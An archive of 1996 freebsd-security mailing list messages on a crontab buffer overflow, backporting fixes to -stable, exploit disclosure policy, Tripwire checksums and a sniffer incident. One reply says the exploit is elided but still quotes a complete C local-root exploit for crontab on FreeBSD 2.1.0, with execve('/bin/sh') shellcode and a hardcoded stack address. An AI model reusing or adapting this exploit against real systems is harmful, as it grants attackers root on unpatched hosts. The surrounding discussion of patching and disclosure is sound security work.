<199612161832.TAA25027@gvr.win.tue.nl> Subject: Re: why is -stable not secure? In-Reply-To: <199612161654.IAA16978@freefall.freebsd.org> from Adam Kubicki at "Dec 16, 96 05:59:06 pm" To: mikee@solozzo.tele.pw.edu.pl (Adam Kubicki) Date: Mon, 16 Dec 1996 19:32:07 +0100 (MET) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Adam Kubicki wrote: > hi, > > I'd like to ask why patches included in -current aren't in -stable > version? There are few serious bugs (security too) fixed in -current but not > in -stable. How long it takes to move patches to -stable source tree?? > Normally they are fixed in both. The recent cron things have been overlooked unfortunately. -Guido From owner-freebsd-security Mon Dec 16 10:53:03 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA24219 for security-outgoing; Mon, 16 Dec 1996 10:53:03 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA24214; Mon, 16 Dec 1996 10:53:01 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id LAA19143; Mon, 16 Dec 1996 11:52:33 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id LAA09039; Mon, 16 Dec 1996 11:21:08 -0700 (MST) Date: Mon, 16 Dec 1996 11:21:08 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Peter Radcliffe cc: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org Subject: Re: crontab security hole In-Reply-To: <199612161534.PAA15934@pir.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Sorry. Delete lines 36 and 37 of the patch. That is delete the middle two lines from the below section: *** crontab.c 1996/04/09 21:23:11 1.3.4.1 --- crontab.c 1996/12/15 20:37:59 1.3.4.2 *************** *** 17,23 **** *************** *** 167,173 **** I manually removed the RCS $Id$ part of the patch and left an extra two lines in. On Mon, 16 Dec 1996, Peter Radcliffe wrote: > > It was fixed in -stable the other day by pst. The patch, pulled > > from the CVS tree, follows. > > yes, but trying to apply that patch to this 2.1.5 box > gives me: > -------------------------- > Patching file crontab/crontab.c using Plan A... > patch: **** unexpected end of hunk at line 38 > -------------------------- > > Peter. > From owner-freebsd-security Mon Dec 16 10:53:49 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA24294 for security-outgoing; Mon, 16 Dec 1996 10:53:49 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA24289 for ; Mon, 16 Dec 1996 10:53:47 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id LAA19149; Mon, 16 Dec 1996 11:53:04 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id LAA09106; Mon, 16 Dec 1996 11:35:05 -0700 (MST) Date: Mon, 16 Dec 1996 11:35:05 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Jason Downs cc: Dmitry Valdov , freebsd-security@freebsd.org Subject: Re: crontab security hole In-Reply-To: <199612161457.GAA18590@threadway.teeny.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk [removed from -bugs] On Mon, 16 Dec 1996, Jason Downs wrote: > In message , > Marc Slemko writes: > > > >It was fixed in -stable the other day by pst. The patch, pulled > >from the CVS tree, follows. > > Haven't any of you ever heard of a very simple and efficient non-stdio > routine called, of all things, strncpy()? > > It's been around for, like, ever. I'm sure that many of us have. If I was writing the patch, I would do it probably use strncpy. However, I think the reason why strncpy wasn't used is because it won't null terminate the string if it is >= the length given. It just means an extra line of code to make sure it is terminated, but I don't see it as being much more than a matter of style in this context. A few quick informal benchmarks show that strncpy is faster than snprintf in some cases and snprintf is faster than strncpy in others. From owner-freebsd-security Mon Dec 16 10:54:25 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA24359 for security-outgoing; Mon, 16 Dec 1996 10:54:25 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA24343 for ; Mon, 16 Dec 1996 10:54:23 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id LAA19157; Mon, 16 Dec 1996 11:53:50 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id LAA09112; Mon, 16 Dec 1996 11:39:59 -0700 (MST) Date: Mon, 16 Dec 1996 11:39:58 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Richard Wackerbarth cc: Joakim Rastberg , security@freebsd.org Subject: Re: crontab security hole exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Yes. Fixes should be posted before exploits. Give people a day or two to fix a hole. People who know what they are doing can make their own exploit once they know the problem exists, but if they wanted to, people like that could find the problem themself anyway. This particular hole is nothing new, unfortunately it slipped through the cracks in -stable. However, if a fix has been available there is nothing wrong with posting an exploit. People shouldn't need to see exploits to act on a known hole, I will bet that there are many people out there who file the hole as "something to get around to fixing sometime" until they see a pretty exploit that gives them root in 2 seconds. On Mon, 16 Dec 1996, Richard Wackerbarth wrote: > jor@xinit.se writes: > > >I would rather like the exploits be posted as they can be used > >to leverage the "management" to pay attention (background: I am working as > >a contractor to run some unix-boxes and although I whine about the low > >security *nothing* happens until I can show I get a #, then someone > >perhaps pulls the plug and pays for a more secure installation. My point > >beeing is that many companies, at least the ones I work for, IGNORES holes > >until someone have shown them the exploit) > > An interesting perspective. > My attitude is that it is better to have obscurity than having the exploit > readily available to a wide audience. I realize that the truly good > crackers can figure it out for themself. But there are many "children" who > will try something when it is handed to them. IMHO, we should at least give > the upper hand to the sysops and, if possible, provide the fix before the > attack becomes widespread. > > From owner-freebsd-security Mon Dec 16 11:21:09 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id LAA25801 for security-outgoing; Mon, 16 Dec 1996 11:21:09 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id LAA25793 for ; Mon, 16 Dec 1996 11:21:05 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id MAA20323; Mon, 16 Dec 1996 12:20:41 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id MAA09461; Mon, 16 Dec 1996 12:18:39 -0700 (MST) Date: Mon, 16 Dec 1996 12:18:39 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Adam Kubicki cc: freebsd-security@freebsd.org Subject: Re: why is -stable not secure? In-Reply-To: <199612161654.IAA16978@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Because no one has put them there. They can be there the second after they are in -current if they are put there; that happens when the person committing them feels confident enough in the patch and has the time to. If you think that the holes discovered in -stable (or current, for that matter) are anywhere near all of them, think again. I would bet that if someone wanted to find a hole to exploit, they would simply have to look over the OpenBSD CVS logs to find dozens. These should be integrated into FreeBSD. When will they? When someone has time. I don't have any more powers than you, but I probably would have had someone commit this fix to -stable within the next few weeks; it is one of the fixes I have sitting around to be commited to various branches that I haven't got around to putting together yet. Most of these problems require little knowledge to find and little knowledge to fix. In fact, things would be helped if someone sat watching the freebsd-cvs-all list which details all the CVS changes and, if you see an important security fix come through that doesn't get commited to -stable, gently prod the person who commited it to -current to commit it to -stable if possible. Now it is even worse than before; there are now three different trees; -current (3.0), 2.2, and 2.1. Don't underestimate the work it takes to keep things together when you have three different places to fix. If there is someone interested in keeping -stable up to date in this way, perhaps they could take on an informal role of keeping it up to date with things like this; find a commiter who will take patches from you that you pull from -current and put into -stable. On Mon, 16 Dec 1996, Adam Kubicki wrote: > hi, > > I'd like to ask why patches included in -current aren't in -stable > version? There are few serious bugs (security too) fixed in -current but not > in -stable. How long it takes to move patches to -stable source tree?? > > -adam > From owner-freebsd-security Mon Dec 16 11:40:36 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id LAA27410 for security-outgoing; Mon, 16 Dec 1996 11:40:36 -0800 (PST) Received: from service.esys.ca (root@service.esys.ca [141.118.1.124]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id LAA27405 for ; Mon, 16 Dec 1996 11:40:30 -0800 (PST) Received: from monet.esys.ca by service.esys.ca with smtp (Smail3.1.28.1 #1) id m0vZiwX-000UlmC; Mon, 16 Dec 96 12:43 MST Received: from cezanne.esys.ca by monet.esys.ca with smtp (Smail3.1.28.1 #6) id m0vZixN-000RZVC; Mon, 16 Dec 96 12:44 MST From: Lyndon Nerenberg To: adrian@virginia.edu cc: freebsd-security@freebsd.org, Don Lewis Subject: Tripwire database for release tree In-Reply-To: Message-ID: Date: Mon, 16 Dec 1996 12:44:09 -0700 (MST) Priority: NORMAL X-Mailer: Simeon for Hpux Motif Version 4.1 Beta 3 X-Authentication: none MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 10 Dec 1996 10:19:54 -0500 (EST) "Adrian T. Filipi-Martin" wrote: > This reminds me, has anyone considered getting a precomputed list > of MD5 signatures for all precompiled system binaries onto the > distribution CDs? While it would not necessarily help those who recompile > world, it would still be a handy time saver. I suppose even the scripts > to make and compare the MD5 checksums would be handy as part of the > system. I've been promising to do this for the better part of a year now. The plan was to include tripwire in the ports collection, and build a precomputed database corresponding to the release binaries that would be included on the CDROM. You could them run tripwire against the CD database to look for altered files. I will see if I can free up a couple of days over the Xmas holidays to complete this work. --lyndon From owner-freebsd-security Mon Dec 16 12:28:27 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA00216 for security-outgoing; Mon, 16 Dec 1996 12:28:27 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id MAA00211 for ; Mon, 16 Dec 1996 12:28:23 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id VAA00967 for ; Mon, 16 Dec 1996 21:28:16 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id VAA28595 for security@freebsd.org; Mon, 16 Dec 1996 21:28:15 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.4/keltia-uucp-2.9) id TAA10693; Mon, 16 Dec 1996 19:16:17 +0100 (CET) Message-ID: Date: Mon, 16 Dec 1996 19:16:17 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: security@freebsd.org Subject: Re: crontab security hole exploit References: X-Mailer: Mutt 0.54 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2815 In-Reply-To: ; from Richard Wackerbarth on Dec 16, 1996 09:14:25 -0600 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk According to Richard Wackerbarth: > My attitude is that it is better to have obscurity than having the exploit > readily available to a wide audience. I realize that the truly good > crackers can figure it out for themself. But there are many "children" who > will try something when it is handed to them. IMHO, we should at least give Even the children can subscribe to Bugtraq. Or 8lgm or even linux-security... > the upper hand to the sysops and, if possible, provide the fix before the > attack becomes widespread. Unfortunately it is generally wishful thinking more than everything else. The only time it happens is when the bug is found during a limited beta testing and it can be fixed before release for example... -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #31: Tue Dec 3 23:52:58 CET 1996 From owner-freebsd-security Mon Dec 16 12:46:07 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA01303 for security-outgoing; Mon, 16 Dec 1996 12:46:07 -0800 (PST) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id MAA01283; Mon, 16 Dec 1996 12:46:03 -0800 (PST) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id NAA01965; Mon, 16 Dec 1996 13:42:51 -0700 From: Terry Lambert Message-Id: <199612162042.NAA01965@phaeton.artisoft.com> Subject: Re: vulnerability in new pw suite To: rb@gid.co.uk (Bob Bishop) Date: Mon, 16 Dec 1996 13:42:51 -0700 (MST) Cc: terry@lambert.org, proff@iq.org, security@freebsd.org, hackers@freebsd.org In-Reply-To: from "Bob Bishop" at Dec 16, 96 00:03:01 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Yeah, fine on an isolated machine, but those pesky users also insist on > using the same weak password on lots of different systems. So if some > sleaze does manage to get root on your system and thus access to your > shadow file, five gets you ten the user passwords he can now derive will > work on neighbouring systems. Five gets you ten that he'll just use rlogin instead, and go for root on the new system from the user account, never knowing the user's password (or caring). Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Mon Dec 16 12:50:31 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA01606 for security-outgoing; Mon, 16 Dec 1996 12:50:31 -0800 (PST) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id MAA01583; Mon, 16 Dec 1996 12:50:27 -0800 (PST) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id NAA01987; Mon, 16 Dec 1996 13:47:23 -0700 From: Terry Lambert Message-Id: <199612162047.NAA01987@phaeton.artisoft.com> Subject: Re: vulnerability in new pw suite To: imp@village.org (Warner Losh) Date: Mon, 16 Dec 1996 13:47:23 -0700 (MST) Cc: terry@lambert.org, dreamer@garrison.inetcan.net, rb@gid.co.uk, proff@iq.org, security@freebsd.org, hackers@freebsd.org In-Reply-To: from "Warner Losh" at Dec 15, 96 10:36:35 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > In message <199612152336.QAA00213@phaeton.artisoft.com> Terry Lambert writes: > : Fool! Your machine is not safe... all ninjas worth their salt carry > : extra ST-506 controllers! Do you know nothing of Tai-Kwan Leap? > > And to Terry Lambert, I leave a boot to the head... :-) > > Warner "I learned Tai-Kwan Leap to kick some bootie" Losh Aie! One of me alone can not hope to defeat you! Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Mon Dec 16 13:13:03 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA03321 for security-outgoing; Mon, 16 Dec 1996 13:13:03 -0800 (PST) Received: from rocket.Ngbert.org (ROCKET.RES.CMU.EDU [128.2.92.143]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id NAA03315; Mon, 16 Dec 1996 13:12:59 -0800 (PST) Received: from localhost (ayn@localhost) by rocket.Ngbert.org (8.7.5/8.7.3) with SMTP id QAA20725; Mon, 16 Dec 1996 16:09:10 -0500 (EST) Date: Mon, 16 Dec 1996 16:09:10 -0500 (EST) From: Andrew Y Ng To: Dmitry Valdov cc: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org Subject: Re: crontab security hole In-Reply-To: Message-ID: Organization: Carnegie Mellon University MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- well, just disallow certain "dangerous" user for setting up cron jobs. or just allow some "good" users to setup cron jobs... :) /ayn On Mon, 16 Dec 1996, Dmitry Valdov wrote: > Are there any fixes for crontab? I've exploit which allow any user to become > root using crontab security hole. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMrW6dJ6qvWJYgw1hAQHk9QP5AamfF/IA2HUuHqfewPk/sbJ2H0OR+964 b9LLoTgEY+siLSIXXi3lvJWBBgqe5rW//MbNR+ZDoV+3BKkW9aZV+IWqcZQh4VH1 KZ2DcXt8ybcFWSJXTpwtamTCYiYIHP1e5WLqhCvilPvXvY4S9s3FA3QSoypMp4R+ YKxVNFkV1aY= =ju8p -----END PGP SIGNATURE----- -- Andrew Y Ng | Carnegie Mellon University http://andrew.Ngbert.org | ECE major, Music minor campus ph: 412/862-2836 | voice mail: 412/268-6700 x30027 | talk: finger ayn@andrew.Ngbert.org * NGBERT.ORG! * | for online status http://www.Ngbert.org | finger ayn@CMU.EDU for more info... --------------------------X------------------------------------- NetBSD FreeBSD Linux NeXT Be Solaris !windoze . Check three friends. If they're OK, you're it. From owner-freebsd-security Mon Dec 16 13:18:43 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA03592 for security-outgoing; Mon, 16 Dec 1996 13:18:43 -0800 (PST) Received: from quackerjack.cc.vt.edu (quackerjack.cc.vt.edu [198.82.160.250]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id NAA03586 for ; Mon, 16 Dec 1996 13:18:38 -0800 (PST) Received: from sable.cc.vt.edu (sable.cc.vt.edu [128.173.16.30]) by quackerjack.cc.vt.edu (8.7.1/8.7.1) with SMTP id QAA16899; Mon, 16 Dec 1996 16:18:33 -0500 (EST) Received: from alsatian.cslab.vt.edu (alsatian.cslab.vt.edu [198.82.184.11]) by sable.cc.vt.edu (8.6.12/8.6.12) with SMTP id QAA24434; Mon, 16 Dec 1996 16:18:32 -0500 Received: from husky.cslab.vt.edu by alsatian.cslab.vt.edu (5.65v3.2/1.1.10.5/18Sep96-0417PM) id AA18667; Mon, 16 Dec 1996 16:18:31 -0500 From: Jeff Aitken Received: by husky.cslab.vt.edu (5.65v3.2/1.1.10.5/22Aug96-1216PM) id AA00715; Mon, 16 Dec 1996 16:18:25 -0500 Message-Id: <9612162118.AA00715@husky.cslab.vt.edu> Subject: Re: crontab security hole exploit To: rkw@dataplex.net (Richard Wackerbarth) Date: Mon, 16 Dec 1996 16:18:25 -0500 (EST) Cc: jor@xinit.se, security@freebsd.org In-Reply-To: from "Richard Wackerbarth" at Dec 16, 96 09:14:25 am X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Richard Wackerbarth writes: > > My attitude is that it is better to have obscurity than having the exploit > readily available to a wide audience. I realize that the truly good > crackers can figure it out for themself. But there are many "children" who > will try something when it is handed to them. IMHO, we should at least give > the upper hand to the sysops and, if possible, provide the fix before the > attack becomes widespread. Seeing as how the original message had *already* been posted to bugtraq AND BoS, the exploit was *already* in the hands of thousands of (potentially evil-minded) people. --Jeff From owner-freebsd-security Mon Dec 16 14:01:06 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA06598 for security-outgoing; Mon, 16 Dec 1996 14:01:06 -0800 (PST) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA06585 for ; Mon, 16 Dec 1996 14:00:59 -0800 (PST) Received: from Mailbox.mcs.com (Mailbox.mcs.com [192.160.127.87]) by Kitten.mcs.com (8.8.2/8.8.2-biteme) with ESMTP id PAA16117; Mon, 16 Dec 1996 15:58:47 -0600 (CST) Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Mailbox.mcs.com (8.8.2/8.8.2) with ESMTP id PAA20334; Mon, 16 Dec 1996 15:58:45 -0600 (CST) Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.2/8.8.2) id PAA19217; Mon, 16 Dec 1996 15:58:42 -0600 (CST) From: Karl Denninger Message-Id: <199612162158.PAA19217@Jupiter.Mcs.Net> Subject: Re: Exploit for crontab bug (FreeBSD 2.1.0). To: leshka@leshka.chuvashia.su Date: Mon, 16 Dec 1996 15:58:42 -0600 (CST) Cc: BUGTRAQ@NETSPACE.ORG, security@freebsd.org In-Reply-To: <199612142224.BAA00961@leshka.chuvashia.su> from "Leshka Zakharoff" at Dec 15, 96 01:24:02 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk (exploit elided) This does not run on -CURRENT with crontab build dates after about mid-October. A perusal of the source shows that the evil sprintf was replaced by snprintf, and that therefore the buffer overwrite should (and appears to in fact) fail. -- -- Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity http://www.mcs.net/~karl | T1's from $600 monthly to FULL DS-3 Service | 33 Analog Prefixes, 65 ISDN, Web servers $75/mo Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/ Fax: [+1 312 248-9865] | 2 FULL DS-3 Internet links; 400Mbps B/W Internal > /* ---------------------------- CUT HERE ----------------------------------- */ > /* */ > /* Hi ! */ > /* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */ > /* If you have any problems with it, drop me a letter. */ > /* Have fun ! */ > /* */ > /* */ > /* ---------------------- */ > /* --------------------------------------------- */ > /* ----------------- Dedicated to my beautiful lady ------------------ */ > /* --------------------------------------------- */ > /* ---------------------- */ > /* */ > /* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */ > > #include > main() > { > #define length 353 > int i,j; > unsigned long start_addr; > char *env[]={NULL}; > char param_string[length]; > char code_string[]= > { > "\xeb\x2a" /* jmp cont */ > > /* geteip: */ "\x5d" /* popl %ebp */ > "\x55" /* pushl %ebp */ > "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ > "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ > "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ > "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ > "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ > "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ > "\xc3" /* ret */ > > /* 0xffffffe0(%ebp): */ "/bin/sh" > /* 0xffffffe7(%ebp): */ "\x01" > > /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ > "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ > > /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ > "\xe8\xcb\xff\xff\xff" /* call geteip */ > "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ > "\x55" /* pushl %ebp */ > "\x55" /* pushl %ebp */ > "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ > "\x55" /* pushl %ebp */ > "\xe8\xd4\xff\xff\xff" /* call execve */ > }; > > for(i=0;i start_addr=0xefbfddf0; > *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr; > strncpy(¶m_string[200],code_string,strlen(code_string)); > *( (unsigned long*) ¶m_string[348])= start_addr; > > execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL); > > } > /* ---------------------------- CUT HERE ----------------------------------- */ > > From owner-freebsd-security Mon Dec 16 14:06:17 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA06975 for security-outgoing; Mon, 16 Dec 1996 14:06:17 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA06968 for ; Mon, 16 Dec 1996 14:06:10 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZlAD-0005R6-00; Mon, 16 Dec 1996 15:05:33 -0700 To: Marc Slemko Subject: Re: why is -stable not secure? Cc: Adam Kubicki , freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 16 Dec 1996 12:18:39 MST." References: Date: Mon, 16 Dec 1996 15:05:32 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Marc Slemko writes: : Because no one has put them there. They can be there the second after : they are in -current if they are put there; that happens when the person : committing them feels confident enough in the patch and has the time to. Likely because no one is confortable enough making blind commits to the -stable branch. I've put a few deltas into the stable branch, but only after finding people to test them. It is much harder than it would appear. -stable is dead dead dead dead. (the CVS branch based on 2.1.x that is). If you are worried about security, running 2.2 when it is released may be your best bet. wish I had better news :-( Warner From owner-freebsd-security Mon Dec 16 14:07:30 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA07037 for security-outgoing; Mon, 16 Dec 1996 14:07:30 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA07030 for ; Mon, 16 Dec 1996 14:07:23 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZlBl-0005RR-00; Mon, 16 Dec 1996 15:07:09 -0700 To: Doug Kwan ~{9XUq5B~} Subject: Re: mail bomb! Cc: Petri Helenius , security@freebsd.org In-reply-to: Your message of "Mon, 16 Dec 1996 16:45:03 +0800." References: Date: Mon, 16 Dec 1996 15:07:09 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Doug Kwan ~{9XUq5B~} writes: : Most ISP's have customers who are not computer gurus. Asking them : to use PGP to verify all our messages would not be a good idea. Anyway : we would take your advice to digitally sign all our messages. However, if you do sign all the messages, then you could filter all those not signed by the right key. The users needn't know which ones are good or bad, or how to use pgp even. It would be a big clue to sendmail to filter out messages based on content (if it can do that). Warner From owner-freebsd-security Mon Dec 16 14:13:34 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA07691 for security-outgoing; Mon, 16 Dec 1996 14:13:34 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA07672 for ; Mon, 16 Dec 1996 14:13:29 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZlHM-0005SA-00; Mon, 16 Dec 1996 15:12:56 -0700 To: Richard Wackerbarth Subject: Re: crontab security hole exploit Cc: Joakim Rastberg , security@freebsd.org In-reply-to: Your message of "Mon, 16 Dec 1996 09:14:25 CST." References: Date: Mon, 16 Dec 1996 15:12:55 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Richard Wackerbarth writes: : An interesting perspective. : My attitude is that it is better to have obscurity than having the exploit : readily available to a wide audience. I realize that the truly good : crackers can figure it out for themself. But there are many "children" who : will try something when it is handed to them. IMHO, we should at least give : the upper hand to the sysops and, if possible, provide the fix before the : attack becomes widespread. Yes, but 99.999% of all the exploits that have been posted to this list first appeared in bugtraq or best-of-security. Nothing new is generally revealed. Now then, if I find a way to crack program xxx, then I should quietly send mail to the authors (or the BSD distributions) with this information. If I'm just passing along a well known hole, then everybody likely already knows about it. Besides, you can easily find lots of holes in lots of programs for the small price of downloading OpenBSD's CVS tree. They have fixed boatloads of these things. some of which have been merged into FreeBSD, but many of which have not. Warner From owner-freebsd-security Mon Dec 16 14:16:42 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA07938 for security-outgoing; Mon, 16 Dec 1996 14:16:42 -0800 (PST) Received: from www.trifecta.com (www.trifecta.com [206.245.150.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA07892 for ; Mon, 16 Dec 1996 14:16:30 -0800 (PST) Received: (from dev@localhost) by www.trifecta.com (8.7.5/8.6.12) id RAA24622; Mon, 16 Dec 1996 17:16:30 -0500 (EST) Date: Mon, 16 Dec 1996 17:16:30 -0500 (EST) From: Dev Chanchani To: Brian Tao cc: FREEBSD-SECURITY-L Subject: Re: URGENT: Packet sniffer found on my system In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 10 Dec 1996, Brian Tao wrote: > > > Expire all the passwords and re-install all the system binaries and > > hopefully he will go away. > > All staff have been notified to cycle their passwords. What to do > with the user base is an entirely different matter... Regarding the attack on your system. Having commercial accounts is a pain in the this case if their passwords have been sniffed. If you show signs you are on to the hacker, he will probably go away. If it is feasible, I would expire the users accounts and just say it is policy at the end of the year 